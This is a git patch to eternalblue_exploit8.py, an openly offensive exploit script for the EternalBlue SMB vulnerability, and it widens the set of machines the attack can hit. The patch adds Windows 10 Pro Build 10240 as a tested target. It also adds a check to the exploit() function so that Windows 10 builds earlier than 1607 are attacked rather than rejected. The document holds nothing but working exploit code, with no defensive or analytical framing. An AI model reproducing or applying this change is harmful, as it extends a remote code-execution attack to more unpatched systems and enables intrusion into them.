From 873c5453680a0785415990379a4b36ba61f82a4d Mon Sep 17 00:00:00 2001 From: worawit Date: Tue, 18 Jul 2017 22:46:45 +0700 Subject: [PATCH] allow to exploit windows 10 <1607 --- eternalblue_exploit8.py | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/eternalblue_exploit8.py b/eternalblue_exploit8.py index 0252599..42a89ee 100644 --- a/eternalblue_exploit8.py +++ b/eternalblue_exploit8.py @@ -12,6 +12,7 @@ The exploit support only x64 target Tested on: - Windows 2012 R2 x64 - Windows 8.1 x64 +- Windows 10 Pro Build 10240 x64 Default Windows 8 and later installation without additional service info: @@ -453,7 +454,12 @@ def exploit(target, shellcode, numGroomConn): conn.login(USERNAME, PASSWORD) server_os = conn.get_server_os() print('Target OS: '+server_os) - if not (server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ")): + if server_os.startswith("Windows 10 "): + build = int(server_os.split()[-1]) + if build >= 14393: # version 1607 + print('This exploit does not support this target') + sys.exit() + elif not (server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ")): print('This exploit does not support this target') sys.exit()